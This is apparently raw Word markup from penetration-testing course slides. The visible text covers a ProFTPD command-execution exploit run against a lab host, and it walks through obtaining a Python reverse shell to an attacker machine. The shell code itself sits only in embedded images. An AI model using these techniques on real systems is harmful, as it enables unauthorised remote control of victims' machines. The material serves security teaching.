          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3D53F857" wp14:editId="596AF84C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11734800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236097" name="Picture 23609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097" name="Picture 236097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14560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="77C45B84" wp14:editId="42F7C3F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11649075</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5695950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="19050" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236098" name="Picture 23609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098" name="Picture 236098"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="19050" cy="28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715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="36260C63" wp14:editId="6CB5FF23">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11658600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5753100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236100" name="Picture 23610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100" name="Picture 236100"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr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2"/>
        </w:rPr>
        <w:t>As before, we can access the site with Python and the requests module.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16538" w:type="dxa"/>
        <w:tblInd w:w="240" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="41" w:type="dxa"/>
          <w:left w:w="165" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="68" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16538"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1F7DDDDB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3364"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16538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</w:tcPr>
          <w:p w14:paraId="2279246D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3225"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C773CB2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="189"/>
              <w:ind w:left="15"/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716608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D09E55E" wp14:editId="1FB1002C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>133350</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-305895</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="10325100" cy="828675"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="338300" name="Group 33830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0325100" cy="828675"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="10325100" cy="82867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40821" name="Picture 340821"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId171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457200" y="0"/>
                                  <a:ext cx="9867900" cy="8286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227542" name="Rectangle 227542"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="590550"/>
                                  <a:ext cx="769770" cy="278702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558D3902" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="38"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">[GCC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1D09E55E" id="Group 338300" o:spid="_x0000_s1061" style="position:absolute;left:0;text-align:left;margin-left:10.5pt;margin-top:-24.1pt;width:813pt;height:65.25pt;z-index:-251599872;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" coordsize="103251,8286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D6k/Zb/ay+Gf7Nv9ga5J8DP+Em+IukvcMniv/hLr&#10;m03iUOmPsvlPEMRyFOhzjPBr5o1rUv7Y1m/v/L8n7VcST+Xu3bdzFsZwM4zRRQBS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">
                      <v:shape id="Picture 340821" o:spid="_x0000_s1062" type="#_x0000_t75" style="position:absolute;left:4572;width:98679;height:82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">
                        <v:imagedata r:id="rId172" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 227542" o:spid="_x0000_s1063" style="position:absolute;top:5905;width:7697;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="558D3902" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="38"/>
                                </w:rPr>
                                <w:t xml:space="preserve">[GCC </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>Python 3.6.5 (default, May 11 2018, 13: 30: 17)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25603D00" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="16305"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t xml:space="preserve">Type </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6460543A" wp14:editId="5E8C1068">
                  <wp:extent cx="123825" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235220" name="Picture 23522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5220" name="Picture 235220"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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825" cy="9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50"/>
              </w:rPr>
              <w:t xml:space="preserve">"help", "copyright", "credits" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5E4FBB" wp14:editId="43258CA1">
                  <wp:extent cx="9525" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235515" name="Picture 23551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5515" name="Picture 235515"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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50"/>
              </w:rPr>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1290D236" wp14:editId="58DD0D4D">
                  <wp:extent cx="66675" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235981" name="Picture 23598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5981" name="Picture 235981"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId1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675" cy="9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50"/>
              </w:rPr>
              <w:t xml:space="preserve">"license" for more </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="335418D7" wp14:editId="3C49D017">
                  <wp:extent cx="85725" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235602" name="Picture 2356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5602" name="Picture 235602"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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725" cy="9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50"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C0CFFA" wp14:editId="5DF7B0EA">
                  <wp:extent cx="133350" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235356" name="Picture 23535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5356" name="Picture 235356"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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350" cy="9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50"/>
              </w:rPr>
              <w:t>information.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024AEE08" wp14:editId="0F9A6766">
                  <wp:extent cx="1619250" cy="266700"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="236060" name="Picture 23606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6060" name="Picture 236060"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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9250" cy="266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810F5A6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="99"/>
              <w:ind w:left="765"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="317D7A44" wp14:editId="35C854C0">
                  <wp:extent cx="9867900" cy="257175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340822" name="Picture 34082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0822" name="Picture 340822"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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867900" cy="2571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DACDA8A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t>&gt;&gt;&gt; requests . get( "http://192.168.229.105/anything.php") . text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B48B614" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="16305"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="61681F9E" wp14:editId="7291D061">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>5314950</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>226386</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1276350" cy="161925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="235961" name="Picture 23596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5961" name="Picture 235961"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17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6350" cy="161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sz w:val="40"/>
              </w:rPr>
              <w:t>'proftpd: 172.17. e. 1: 38434: SITE cpto /tmp/www-data\n'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF40D3A" wp14:editId="53AC4ACD">
                  <wp:extent cx="1228725" cy="200025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="235942" name="Picture 23594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5942" name="Picture 235942"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18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287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13BE876C" wp14:editId="0F5DF1C2">
                  <wp:extent cx="1628775" cy="200025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="236007" name="Picture 23600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6007" name="Picture 236007"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18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877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40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB4E410" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="542" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>See how the full command is visible?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E1AEB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The result of whoami just follows after "=/tmp" , like the PHP code did</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221069CF" wp14:editId="6AB7E4DE">
            <wp:extent cx="790575" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340828" name="Picture 34082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828" name="Picture 340828"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="790575" cy="21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7B92CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The output of the whoami command is www-data!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB6564" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="52"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Now we understand how the exploit works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D79AF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="282" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We've seen a Python script do it wrong, and a Metasploit module do it right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1E592" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="178" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Why not write a Python 3 script, that incorporates all the best parts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0F851" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="308" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Correct inputs, communicative output, exception handling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26731305" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="1414" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>The command &amp; control should be as flexible and easy as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD6742" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD3FB1B" wp14:editId="7E550835">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="236751" name="Picture 23675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751" name="Picture 236751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363980" cy="1036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5F0A8B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="76"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Leverage an exploit to get a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53245FD8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The best form of control is a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DCA25" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="402" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you have a form of Remote Code Execution (RCE), you can have the victim machine connect back </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>to you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0BDC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>With a reverse shell, you interact with a command-line actively on the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3CD741" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="298" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This can be accomplished with many different languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1AA44B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="494"/>
        <w:ind w:left="1710"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D9640" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F28CB72" wp14:editId="7B11A75B">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="237273" name="Picture 23727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7273" name="Picture 237273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409700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1A209F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In Python, this is accomplished with two modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362218C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="184" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>You have connected with a remote host with the socket module before...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ADAAA9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="403" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>And you have heard of the os module!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78F514" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>For a Python reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ED861" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1530" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4E512E" wp14:editId="2A8D4D1F">
            <wp:extent cx="10306050" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340830" name="Picture 34083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830" name="Picture 340830"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10306050" cy="2733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9FF275" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Basic source code for a Python reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E253797" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="17"/>
        <w:ind w:left="300" w:right="-225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D45809" wp14:editId="32420678">
            <wp:extent cx="10906125" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340832" name="Picture 34083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832" name="Picture 340832"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10906125" cy="3476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D26177" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="384" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Remember, you connect back to your attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1E242" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Duplicating the file descriptors, 0, 1, and &amp; 2 make the connection interactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81B127" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
